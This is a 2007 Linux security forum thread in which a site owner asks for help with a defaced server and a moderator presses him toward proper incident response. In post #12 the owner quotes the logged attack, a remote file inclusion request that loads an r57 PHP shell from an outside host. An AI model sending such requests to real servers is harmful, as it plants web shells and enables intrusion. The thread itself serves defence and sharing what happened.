Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
|
|
03-09-2007, 08:37 AM
|
#1
|
Member
Registered: Sep 2003
Posts: 72
Rep:
|
My server has been hacked....defaced
Hello,
Yesterday my server has been hacked and all my websites where defaced.
I thought I had a well protected system however it seems that the attack has been done via Apache.
I was just working on the server a few minutes ago and I saw the CPU load increase.
As I did not start any unusual application...I was a bit puzzled:
I noticed : owner apache command: find . -f chmod 777.
I think apache is not able to start such a process automatically...
Is it a normal apache behaviour? Or is it well a new attack?
Thanks for your answers
macadam
|
|
|
03-09-2007, 08:55 AM
|
#2
|
LQ Guru
Registered: May 2005
Location: Atlanta Georgia USA
Distribution: Redhat (RHEL), CentOS, Fedora, CoreOS, Debian, FreeBSD, HP-UX, Solaris, SCO
Posts: 7,831
|
Sounds like an attack.
chmoding all files to be read,write,execute for everyone (777) is never a good idea.
Make sure you're running only the initial httpd process as root - all the rest of the apache processes should be running as a different user (modify httpd.conf) for that.
Also use lsof to see who is connected - you can use iptables to block suspected offending addresses.
|
|
|
03-09-2007, 09:02 AM
|
#3
|
Moderator
Registered: May 2001
Posts: 29,415
|
Yesterday my server has been hacked and all my websites where defaced.
Letting it linger that long isn't a good start...
Is the box in colo or local?
I thought I had a well protected system however it seems that the attack has been done via Apache. I was just working on the server a few minutes ago and I saw the CPU load increase. As I did not start any unusual application...I was a bit puzzled: I noticed : owner apache command: find . -f chmod 777. I think apache is not able to start such a process automatically... Is it a normal apache behaviour? Or is it well a new attack?
Most likely a flaw in an (outdated version of an?) app Apache runs, think PHP-based fora or Wordpress or Awstats.
While I'll be taking shortcuts here, do the following to mitigate the situation, I'll post more verbose instructions soon after (do use common sense when executing):
- save snapshots of 1) processes, 2) network connections, 3) open files and 4) users off-site,
- reconfigure the firewall so only your IP (range) has access to anything on the box and restart the firewall,
- kill publicly accessable services (except SSH to get in) and keep them from starting up,
- if possible: reboot.
|
|
|
03-09-2007, 09:02 AM
|
#4
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
Wow that's a quick reply.
Initial Httpd is running as root and the other processes as 'apache' so...at least this is good.
Stupid question but is httpd as user 'allowed' to chmod? is there a risk?
|
|
|
03-09-2007, 09:09 AM
|
#5
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
Hi UnSpawn
I restored everything a few minutes after the attack...I am not crazzy ;-)
Thanks god, I have a good backup philosophy!
The box is a dedicated server hosted in a center.
I tried to get the IP of the attack but no luck...missed it.
|
|
|
03-09-2007, 09:11 AM
|
#6
|
Moderator
Registered: May 2001
Posts: 29,415
|
Initial Httpd is running as root and the other processes as 'apache' so...at least this is good.
Yes, Apache starts as root and drops rights to the unprivileged "apache" user. Those are the children and they handle the requests. Mind you: "good" is IMNSHO not a valid criterium to base a decision on: you have to *verify* everything but we'll work on that.
Stupid question but is httpd as user 'allowed' to chmod?
Apache itself has no concept of applying or changing DAC rights. My first guess would be an uploaded PHP shell or remote includes.
is there a risk?
Yes. Mitigate the situation and do it NOW.
Last edited by unSpawn; 03-09-2007 at 09:14 AM.
|
|
|
03-09-2007, 09:16 AM
|
#7
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
Thanks for your reply... I am monitoring and checking everything for hours...try to spot the problem!!!
|
|
|
03-09-2007, 09:23 AM
|
#8
|
Moderator
Registered: May 2001
Posts: 29,415
|
I am monitoring and checking everything for hours...try to spot the problem!
I need to get one thing straight here. Could you tell me if you intend to mitigate the situation as outlined above or if you intend to continue your "monitoring and checking" approach?
|
|
|
03-09-2007, 09:28 AM
|
#9
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
I do my best...sorry
|
|
|
03-09-2007, 09:35 AM
|
#10
|
Moderator
Registered: May 2001
Posts: 29,415
|
Definately no need to *apologise*. It's just that I would like to know what kind of support you will be needing. After all we won't be doing this, you are.
|
|
|
03-09-2007, 09:56 AM
|
#11
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
Well I am not an expert...just a common Linux user let's say and I thank you for the time you allocate to my problem.
I just want to prevent the hacking of yesterday to happen again (he replaced all index.php or index.htm* with his own file...)
So I just want to spot the vulnerability and 'solve' this issue...
|
|
|
03-09-2007, 10:43 AM
|
#12
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
OK Hacked again...got his IP 88.230.29.147 and found how he got in...
POST /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.turkbanner.net/lang/r57.jpg? HTTP/1.1
I am deleting this module...
|
|
|
03-09-2007, 11:00 AM
|
#13
|
Moderator
Registered: May 2001
Posts: 29,415
|
(..) I just want to prevent the hacking of yesterday to happen again
(...) I just want to spot the vulnerability and 'solve' this issue...
To be able to help us help you in a meaningful way I had to ask some questions. You answered about one I think. That leaves me with about zilch nfo to work with. Sure it would be easy to spill generic steps to take like reconfigure the box, update your software and harden it. That is however not even half the story but if you "just want to solve this" your way and get on with it, then so be it.
Let's make it clear I do not support that approach.
The best approach IMHO would be to first make sure the box is under your control. (Re)gaining control, keeping further damage from occurring, restricting access and making sure the box *stays* under your control is mandatory. Any further action is a waste of time and effort without that. The next step would be to verify the whole system in all aspects to assess to what extent the perp had access to the system. That step is mandatory because the conclusions you draw dictate what steps to take next. If you cannot ascertain the system was untouched and access was confined to only unprivileged user access then the only way to regain trust is a full system rebuild (as in repartition, reformat, reinstall from scratch). Sure you could sidestep this by restoring from a backup, but that would only work if 1) the backup covers the system completely, 2) the integrity of the backup can be verified w/o doubt and 3) the system will be brought up in a controlled way and access is restricted until the system is reconfigured, updated and hardened.
Since you haven't mitigated the situation, as your latest post clearly shows, you're back at post #3.
|
|
|
03-10-2007, 12:05 PM
|
#14
|
Member
Registered: Sep 2003
Posts: 72
Original Poster
Rep:
|
HI,
I surely did not want to upset you...
I followed your suggestions but in my opinion, there is no use to restore backups and system if the way the hacker went through is not defined...the same situation will occur again after restoration.
So first, I found how it came through. At that moment, log copied, server isolated and solutions applied.
After that procedure and hours of checks to trust again all params, the server is back online.
thanks for your help, and it is always good to be a bit shaken by experts ;-)
regards
macadam
|
|
|
03-10-2007, 06:45 PM
|
#15
|
Moderator
Registered: May 2001
Posts: 29,415
|
I followed your suggestions but in my opinion, there is no use to restore backups and system if the way the hacker went through is not defined...the same situation will occur again after restoration.
You didn't read what I wrote too well.
So first, I found how it came through. At that moment, log copied,
Wasn't hard to locate the exploit. BTW, sharing detailed who-what-how info definately is the best way to thank LQ for its efforts, and sharing your experiences may win you the gratitude of those users that may find themselves in the same position.
server isolated and solutions applied. After that procedure and hours of checks to trust again all params, the server is back online.
Details on what "solutions applied" and what "checks to trust again all params" contain would be welcome.
|
|
|
All times are GMT -5. The time now is 11:52 AM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|